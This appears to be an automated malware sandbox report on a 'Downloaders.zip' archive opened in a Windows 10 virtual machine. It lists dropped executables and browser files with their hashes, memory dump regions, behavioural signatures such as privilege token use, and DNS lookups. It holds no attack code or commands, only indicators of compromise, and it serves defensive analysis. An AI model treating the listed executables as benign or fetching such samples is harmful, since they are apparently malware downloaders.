memory/6084-1075-0x0000000004C50000-0x0000000004D6A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\M5iFR20.exe
| MD5 | 5950611ed70f90b758610609e2aee8e6 |
| SHA1 | 798588341c108850c79da309be33495faf2f3246 |
| SHA256 | 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4 |
| SHA512 | 7e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80 |
memory/6084-2270-0x0000000004EB0000-0x0000000004EFC000-memory.dmp
memory/6084-2265-0x0000000004F20000-0x0000000004FAA000-memory.dmp
memory/5724-2273-0x0000000000400000-0x00000000005CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\networkmanager.exe
| MD5 | f8d528a37993ed91d2496bab9fc734d3 |
| SHA1 | 4b66b225298f776e21f566b758f3897d20b23cad |
| SHA256 | bc8458a8d78cf91129c84b153aafe8319410aacb8e14aec506897c8e0793ba02 |
| SHA512 | 75dc1bbb1388f68d121bab26fc7f6bf9dc1226417ad7ed4a7b9718999aa0f9c891fed0db3c9ea6d6ccb34288cc848dc44b20ea83a30afd4ea2e99cff51f30f5a |
memory/5500-2299-0x00000000004B0000-0x0000000000C2B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c2d9eeb3fdd75834f0ac3f9767de8d6f |
| SHA1 | 4d16a7e82190f8490a00008bd53d85fb92e379b0 |
| SHA256 | 1e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66 |
| SHA512 | d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd |
C:\Users\Admin\Desktop\Downloaders\4363463463464363463463463\Files\T3.exe
| MD5 | 5e7c5bff52e54cb9843c7324a574334b |
| SHA1 | 6e4de10601761ae33cf4de1187b1aefde9fefa66 |
| SHA256 | 32768587423824856dcd6856228544da79f0a2283f822af41b63a92b5259c826 |
| SHA512 | 8b07b8470a8536ca0541672cb8bf5dc5ed7fa124cfc454868564b86474d07c17ef985fc731754e4d37cc5c81f8813f0d2b59223e7b3b6268c10ff2af8f39eaa2 |
memory/6700-2314-0x0000018B44020000-0x0000018B44150000-memory.dmp
memory/6700-2315-0x0000018B5E6D0000-0x0000018B5E7FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\9feskIx.exe
| MD5 | 58f824a8f6a71da8e9a1acc97fc26d52 |
| SHA1 | b0e199e6f85626edebbecd13609a011cf953df69 |
| SHA256 | 5e5b808ed64c4f40e07a4894e1da294e364383f0a51adb7ec8c7568afba3eb17 |
| SHA512 | 7d6c752369ea83bad34873d8603c413e9372ff66adcaad11e7f23d3ce85827e057444b30eadf927329191825aef4dc37a1e68c30b71fae4ce6f53708102fb461 |
memory/5600-3400-0x0000000000400000-0x0000000000A9C000-memory.dmp
memory/6576-3404-0x00007FF60DEE0000-0x00007FF60E370000-memory.dmp
memory/6700-3403-0x0000018B5E850000-0x0000018B5E8F4000-memory.dmp
memory/5592-3405-0x0000000000880000-0x0000000000CF6000-memory.dmp
memory/5592-3399-0x0000000000880000-0x0000000000CF6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e55832d7cd7e868a2c087c4c73678018 |
| SHA1 | ed7a2f6d6437e907218ffba9128802eaf414a0eb |
| SHA256 | a4d7777b980ec53de3a70aca8fb25b77e9b53187e7d2f0fa1a729ee9a35da574 |
| SHA512 | 897fdebf1a9269a1bf1e3a791f6ee9ab7c24c9d75eeff65ac9599764e1c8585784e1837ba5321d90af0b004af121b2206081a6fb1b1ad571a0051ee33d3f5c5f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 986adf9b48daf2a331dd82b1d73873f2 |
| SHA1 | 652d4a02e4e6bfefbbf8a38ae37dc713286a1f24 |
| SHA256 | 8debb2848fa40832c8be2f2aa47a4fb6a8d125616d1bc14a585487337d2ccee6 |
| SHA512 | 95f3fc1811614ef1bd9d165ed82a0e4282aa092fa268ac21f2eb929f201989da47cfc2aef685826e285109eac9c650e9a28836209036b9494c9baa6393e9c6e4 |
C:\Users\Public\Desktop\ᕏ⠍ृ↕ន⇟⛏ᔐׄ⍴⸞᭷ੵᛂ⠯ႈວ๛℁ᕭ
| MD5 | e49f0a8effa6380b4518a8064f6d240b |
| SHA1 | ba62ffe370e186b7f980922067ac68613521bd51 |
| SHA256 | 8dbd06e9585c5a16181256c9951dbc65621df66ceb22c8e3d2304477178bee13 |
| SHA512 | de6281a43a97702dd749a1b24f4c65bed49a2e2963cabeeb2a309031ab601f5ec488f48059c03ec3001363d085e8d2f0f046501edf19fafe7508d27e596117d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ad60510a71538c68a0cca38b530b687c |
| SHA1 | 0fe457fa7481698f9bd2cafe0952527f6d060efd |
| SHA256 | 3534c650dd1ab16ba66f003091e4b80d9c83a31c6b666e34713b39ef629d9dc4 |
| SHA512 | ab520edd22e37dd2173d6e922c0f70e965b0e58f18c32651f7938e5105ecc1d769a12e5c764da25c7093f9af6ca5e29b1888efacb4fed74bb71f3e8c716af884 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8d6a49533ea18bbd716d61778f98e5fa |
| SHA1 | d6a31231232945afff3beca4e683e0bd278b06e5 |
| SHA256 | 7fbfc3eb3aa9808dfabbedb76e910d2f9127c913c1a5584eb8b8b24640df0638 |
| SHA512 | caa2f3588006a4a4ffbb9501ed640bef8115aa9531ab26b3faadc6a1ec55bd325fe9049b821b9194f77e83f4d295e1bcceb965624e491161251b4e07d58bc958 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7ca295887088cf5c36e9402334b96cea |
| SHA1 | e9f73fe1f6e0819aab3ed8de035b5254993ee2e3 |
| SHA256 | c401b82ec30aaec5a23538f998ccdfa76a6df73e9c36ac6d26dabe87ddc2fd7c |
| SHA512 | 8bf50d2366ec915311e2b0426be1e3ec31530f3a208cfe0cb61fe8c51b2c797193069228ead573a0567a3cdd2e5d72cb81161366a5860fb4dedb25ebb0d5fd63 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-12 18:16
Reported
2024-12-12 18:19
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Processes
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected\Downloaders.zip"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |